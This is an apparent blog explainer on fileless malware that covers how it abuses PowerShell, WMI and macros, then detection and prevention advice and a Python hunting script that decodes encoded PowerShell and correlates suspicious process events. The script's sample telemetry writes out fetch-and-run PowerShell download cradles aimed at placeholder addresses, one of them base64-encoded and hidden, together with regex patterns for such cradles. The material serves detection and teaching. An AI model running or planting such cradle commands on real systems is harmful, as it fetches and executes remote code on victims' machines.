Fileless Malware, and a bit about what it is
Fileless malware is an advanced form of malicious code that abuses legitimate, already-installed programs to infect a computer and runs entirely in memory, without writing its own executable to disk.
It hijacks the victim's own programs and tools to carry out the attack: ordinary components such as PowerShell, the system shell, WMI and Office macros become the vehicle for executing malicious code. Because it does not rely on dropping a traditional binary, it leaves little or no footprint on disk, which makes it hard to detect. In many cases a reboot wipes the in-memory traces; in practice, though, attackers often add a small persistence hook (a registry entry, scheduled task or WMI event subscription) so the chain is re-launched after a restart, so a clean disk after reboot is not proof of a clean machine.
Fileless attacks are known to evade defenses such as application whitelisting, because the programs they abuse are already installed and already on the approved list.
No operating system is immune: the industry has seen advanced fileless attacks on Windows, Linux and other platforms. Like most attacks, fileless attacks typically gain initial access through spear-phishing email and social engineering, then use lateral movement to reach their targets, mostly by taking over vulnerable legitimate programs and riding on their back.
Approaches to detect the infection
Chances are your EPP/EDR has already been bypassed; if it does not raise the alarm, the approaches below can help uncover an ongoing attack.
⁃ A well-tuned SIEM, alerting on the correlated behaviour an infected host triggers (for example an Office application spawning PowerShell, an encoded PowerShell command line, or a script host launched through WMI, all on one machine within minutes) rather than on any single event.
⁃ A threat-hunting exercise: in-memory analysis of running processes, combined with file-integrity analysis of system files.
⁃ Digital forensics (labor- and cost-intensive).
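As an added example of the SIEM and threat-hunting points above (this is not code from the original post), the Python below runs a few behavioural rules over constructed Sysmon-style process-creation records, decodes PowerShell -EncodedCommand payloads so the download cradle hidden inside them becomes visible, and raises a host-level alert only when several distinct rules fire on one host within a short window. That last step is the correlation a SIEM does: one encoded command line is an admin's Tuesday, an Office process spawning an encoded PowerShell that pulls code off the network is an attack chain. The record field names, rule names, sample events and addresses are assumptions made for the demo.

```python
"""Behavioural hunt for fileless-malware chains in process-creation telemetry.
Added example, not code from the original post. Assumes Sysmon Event ID 1 style
records (ts, host, parent, image, cmdline) as JSON lines; sample data is constructed."""
import base64
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# In-memory download-and-execute primitives typical of fileless chains.
DOWNLOAD_CRADLE = re.compile(
    r"IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient"
    r"|Invoke-WebRequest|FromBase64String", re.I)
# -EncodedCommand (and the shortened forms PowerShell accepts) followed by base64.
ENCODED_FLAG = re.compile(
    r"\s-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)"
    r"\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # not real base64 / not UTF-16
        return None


def match_rules(ev):
    """Names of the behavioural rules one process-creation event triggers."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")   # macro handing off to a shell
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        hits.append("wmi_spawns_script_host")      # shell launched through WMI
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        hits.append("powershell_encoded_command")
    if DOWNLOAD_CRADLE.search(cmd) or (decoded and DOWNLOAD_CRADLE.search(decoded)):
        hits.append("download_cradle")             # fetch-and-run straight into memory
    return hits


def correlate(events, window=timedelta(minutes=10), min_rules=2):
    """Per-host alert when >= min_rules distinct rules fire inside one time window."""
    # A lone hit is noisy (admins use -enc too); several different ones on the
    # same host within minutes is the correlated behaviour worth escalating.
    per_host = defaultdict(list)
    for ev in events:
        for rule in match_rules(ev):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), rule))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            rules = sorted({r for t, r in hits[i:] if t - t0 <= window})
            if len(rules) >= min_rules:
                alerts[host] = rules
                break
    return alerts


def scan_log(text):
    """Parse JSON-lines telemetry; return {host: [rule, ...]} for alerting hosts."""
    return correlate(json.loads(ln) for ln in text.splitlines() if ln.strip())


# Constructed sample telemetry (not real logs); addresses are documentation ranges.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"ts": "2024-03-01T09:00:01", "host": "WS01", "parent": r"C:\Windows\explorer.exe",
     "image": WORD, "cmdline": '"WINWORD.EXE" /n invoice.docm'},
    {"ts": "2024-03-01T09:00:05", "host": "WS01", "parent": WORD, "image": PS,
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_B64}"},
    {"ts": "2024-03-01T09:03:00", "host": "WS02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": PS, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ts": "2024-03-01T09:10:00", "host": "SRV01", "image": PS,
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe -NoP -NonI -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/s')\""},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for host, rules in scan_log(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(rules)}")
```

Run as-is it reports WS01 (macro-spawned, encoded PowerShell with a download cradle) and SRV01 (WMI-launched PowerShell with a cradle) and stays silent on WS02, whose `-ExecutionPolicy Bypass -File backup.ps1` trips no rule. The decoder is the hunting detail worth copying: without it the base64 blob in WS01's command line matches nothing, and the cradle only appears once the UTF-16LE payload is recovered.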
Known approaches to prevention
⁃ Nothing beats keeping software up to date with patches.
⁃ Sound endpoint protection, combined with email threat prevention at the gateway.
⁃ Reducing the attack surface: disabling unneeded services, programs and exposure, which for the tools named above means constraining PowerShell and the other script hosts and blocking Office macros from untrusted sources.
⁃ Protecting admin accounts with Privileged Access Management, so that unrestricted admin access is controlled rather than standing.
⁃ Regular penetration-testing exercises, to find the weak points and harden the infrastructure.
Preventing and detecting fileless malware attacks early in the attack cycle needs an end-to-end approach that addresses the whole threat lifecycle, with well-defined controls in place at each layer.